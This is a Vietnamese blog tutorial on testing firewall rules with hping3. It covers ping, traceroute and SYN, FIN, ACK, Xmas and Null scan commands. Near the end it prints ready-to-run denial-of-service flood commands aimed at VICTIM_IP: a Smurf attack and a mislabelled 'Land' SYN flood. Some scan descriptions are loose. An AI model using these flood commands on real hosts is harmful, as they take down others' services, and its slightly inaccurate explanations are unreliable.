HellCat VN Blog
  • Wapmaster
    • Wapbuider
    • Wordpress
    • XenForo
    • Theme XenForo
    • Theme Wordpress
    • Hacking - Bảo mật
    • JohnCMS
    • All Shared Code
    • Blogger
    • Template Blogger
  • Học Lập Trình
    • Scritp - Js
    • Php - MySql
    • Html - Css
    • C#
    • Pascal
  • Đồ Hoạ
    • PhotoShop
    • PSD Tổng Hợp
    • Action
    • Fonts Tổng Hợp
    • ProShow Produce
    • Style Produce
    • AegiSub
  • Thủ Thuật
    • Thủ Thuật
    • Wapmaster
    • Blogger
    • Facebook
    • SEO
    • Kiếm Tiền Online
    • Chia Sẻ Coupon
  • Follow me
    • Twitter
    • Facebook
    • Google+
    • Youtube
    • ­­­



Trang chủ / Bảo mật / Kiểm tra Firewall Rules với công cụ Hping3

❤ Kiểm tra Firewall Rules với công cụ Hping3 ❤

HellCatVN   9:23 AM   Bảo mật   0  
Popular Posts

Tổng quan về công cụ Hping3

Hping3 là một công cụ để tạo kịch bản sử dụng ngôn ngữ TCL, các gói được gửi – nhận thông qua các chuỗi nhị phân, hoặc các chuỗi mô tả cho các gói. Ví dụ: xây dựng các kịch bản về kiểm tra Firewall, kiểm tra chồng giao thức TCP/IP, một vài dạng tấn công phổ biến, xây dựng bảng định tuyến. Hping3 hoạt động ở chế độ dòng lệnh, Scripts có thể tạo và đọc các gói; các lệnh với mục đích đọc, triển khai, liệt kê các cổng, bảng ARP, bảng định tuyến và firewalling. Hping3 không chỉ là một gói đơn thuần với phần mở rộng dành cho scripting language, nó là một công cụ bảo mật có tính chất kịch bản. Tuy nhiên Hping3 scripts có thể truy xuất hầu hết các tính năng của ngôn ngữ TCL, vì vậy kết quả scan cổng sử dụng Hping3 có thể được lưu trữ trong cơ sở dữ liệu MySQL, vẽ lưu đồ với những port mở và nhiều thứ khác

Kiểm tra Firewall rules với Hping3


  • Testing ICMP: trong ví dụ Hping3 sẽ gần như là một gói ping bình thường, gửi ICMP-echo và nhận về ICMP-reply
Hping3 -1 domainexample.com
  • Traceroute sử dụng ICMP: ví dụ này giống như tracert trên hệ điều hành windows hoặc traceroute trên hệ điều hành linux, giá trị TTL sẽ tăng lần lượt 1đơn vị trong gói ICMP.
Hping3 –traceroute -V -1 domainexample.com
  • Checking port: Ở đây Hping3 sẽ gửi gói SYN tới port đã xác định (ví dụ này sử dụng port 80). Local port bắt đầu scan là (5050).
Hping3 -V -S -p 80 -s 5050 domainexample.com
  • Traceroute để xác định ra port: sử dụng traceroute để xác định ra vị trí mà gói của bạn bị blocked.
Hping3 –traceroute -V -S -p 80 -s 5050 domainexample.com
  • Các loại khác của gói ICMP: ví dụ này gửi gói ICMP address mask request (Type 17).
Hping3 -c 1 -V -1 -C 17 domainexample.com
  • Các loại khác của Port Scanning: Loại đầu tiên; FIN scan. Đối với kết nối TCP thì cờ FIN được sử dụng để bắt đầu quá trình đóng kết nối. Nếu chúng ta không nhận reply, có nghĩa là port mở. Thông thường firewalls gửi ngược trở lại gói RST + ACK nhằm thể hiện port đã được đóng.
Hping3 -c 1 -V -p 80 -s 5050 -F domainexample.com
  • ACK Scan: Kiểu scan này được sử dụng nhằm xác định ra host, nếu như host đó tồn tại (khi không được phép sử dụng lệnh ping). Lúc này sẽ gửi hồi đáp RST nếu port mở.
Hping3 -c 1 -V -p 80 -s 5050 -A domainexample.com
  • . Xmas Scan: Kiểu scan này thiết lập sequence number về 0 và thiết lập cờ URG + PSH + FIN trong gói. Nếu như port TCP của thiết bị đích đóng, thì thiết bị đích gửi gói TCP RST trong nội dung reply. Nếu như port TCP của thiết bị đích mở, thì thiết bị đích discards kiểu TCP Xmas scan và không gửi reply.
Hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF domainexample.com
  • Null Scan: Kiểu scan này thiết lập sequence number về 0 và không có bất kỳ một cờ nào được thiết lập trong gói. Nếu như port TCP của thiết bị đích đóng, thì thiết bị đích gửi TCP RST packet trong reply. Nếu như port TCP của thiết bị đích mở, thì thiết bị đích discards TCP NULL scan và không gửi reply.
Hping3 -c 1 -V -p 80 -s 5050 -Y domainexample.com
  • Smurf Attack: đây thuộc về kiểu tấn công denial-of-service thông qua việc floods tới hệ thống đích bằng việc giả mạo broadcast trong thông điệp ping.
Hping3 -1 –flood -a VICTIM_IP BROADCAST_ADDRESS
  • DOS Land Attack:
Hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 –flood –rand-source VICTIM_IP
  • Một số tham số khác.
–flood: sent packets as fast as possible. Don’t show replies.
–rand-dest: random destionation address mode. see the man.
-V <– Verbose
-c –count: packet count
-d –data: data size
-S –syn: set SYN flag
-w –win: winsize (default 64)
-p –destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-s –baseport: base source port (default random)

    Share Share Share
    Bảo mật

    Administrator: Hell Cat VN

    Không điều gì là tồn tại mãi mãi cho đến lúc bạn ngừng cố gắng! Một cậu học sinh trung học luôn có ước mơ và hoài bão...Bạn hãy làm những việc bình thường bằng lòng say mê phi thường, thành công sẽ đến với bạn!!

    CÓ THỂ BẠN SẼ THÍCH

    Đang tải...

    No comments

    Bài đăng mới hơn Bài đăng cũ hơn Trang chủ

    Bình Luận Mới Nhất

    ADS

    Bài đăng phổ biến

    • Công Cụ Dịch Ngôn Ngữ Sky P.2
      Bộ Dịch Sky chữ 'x Gõ tiếng Việt chuẩn tại đây, tiếng sky sẽ xuất hiện ở ô dưới. Lưu Ý : chữ cuối cùng phải thêm dấu cách để có 'x ...
    • Hướng dẫn sử dụng tool check skin LOL:
      Hướng dẫn sử dụng tool check skin LOL: B1: các bạn vào link : http://lolskinview.software.informer.com/download/  để tải phần mềm LOLSKINVIE...
    • Share Template Blogg MrTxKỳAnh Và Template Bmag 202
      Download Tải Xuống Download Tải Xuống Liên Hệ Facebook Ai cần ib mình nhé mình chỉ all iu all :))
    • BitCoin Đồng Tiền Ảo Mang Giá Trị Thật P.1
      1.BitCoin là gì? Bitcoin (ký hiệu: BTC ) là một loại tiền tệ kỹ thuật số phân cấp dựa trên một mã nguồn mở, giao thức internet ngang hàng. ...
    • 3D Hacker
      Download Tải Xuống Liên Hệ Facebook
    • Tìm hiểu DoS vs DDoS P.1
      DoS là gì ? Một cuộc tấn công dạng Từ-chối-Dịch-vụ /Denial-of-Service (DoS) được thiết kế để ngăn trở hoặc chặn đứng các họat động thông thư...
    • Share Code Web Loli Team Dùng để Deface P.9
      Như Tiêu Đề thì nay mình sẽ share cho các bạn 1 index đẹp lung linh về chủ để hacker để các bạn dùng khi deface 1 trang web hay làm web giới...
    • PSD 3D / Kỳ Anh
                                    Download
    • Hướng dẫn tải video Youtube không cần sử dụng phần mềm
      Tải video trên youtube không có phần mềm hỗ trợ, áp dụng cách sau: - Truy cập video cần tải  - Thay “https://www. ” trên address thành “ss” ...
    • Tool DDos Online P.3
      Ddos tool online Code Ddos DDos HTML Do tool này mình sử dụng embed  nguồn của mình vào nên không đủ chiều rộng hiển thị bạn nào cảm thấy bấ...

    Chuyên Mục Hot

      3D Android Ảnh Đại Diện Video apk au Bảo mật blockchain blockytool Blog bóng rổ Brush btc buff camera cartytools cashpirate chibi chỉnh sửa ảnh trực tuyến Cơ Bản code cookie ddos ddos tool ddos tool online Deepweb deface demo deodex dork dota dummper dxdiag facebook follow fshare get link hack hack wifi hacking hctools html html1 htmleditor hướng dẫn Hướng dẫn HIT LEAP trang web lên top in hình trái tim index jdk jre jumpstart kalilinux Khái Niệm ký tự cho game Ký Tự Đặc Biệt like Logo lol messenger game mmo mmoapps mod android ngonngu notice Notification Bar photoeditor1 photoeditor2 plugin cua sublime plugin cua sublime text plugin của sublime text plugin quan trọng của sublime text Hellcat LOLI team Plugin sublime text premise PSD Cover ptc pts qandme Qoutes Quản trị mạng robotcoingame rom seo skycode SQLi Statusbar stripytool sub tartytool teencode Template tên thành hình trái tim texttools Thủ thuật fb thủ thuật lmht thủ thuật máy tính thủ thuật pc tips token tool tool LOL tools Tozaco trái tim từ chữ ttfb ttpc Viết Chữ Đóng Khung viết chữ gạch dưới viết chữ gạch ngang Viết Chữ Ký Tự Đặc Biệt viết chữ ngược vltk webmaster webnoel wifi Wind PTS wpa wpa2 wps pin Xem Cấu hình Máy youtube downloader zingspeed
    Copyright © 2015- | Thủ thuật - Công Nghệ - Webmaster | All Right Reserved.
    Tags : Share Code / PhoToShop / FaceBook Tips
    Blog Được Phát Triển Bởi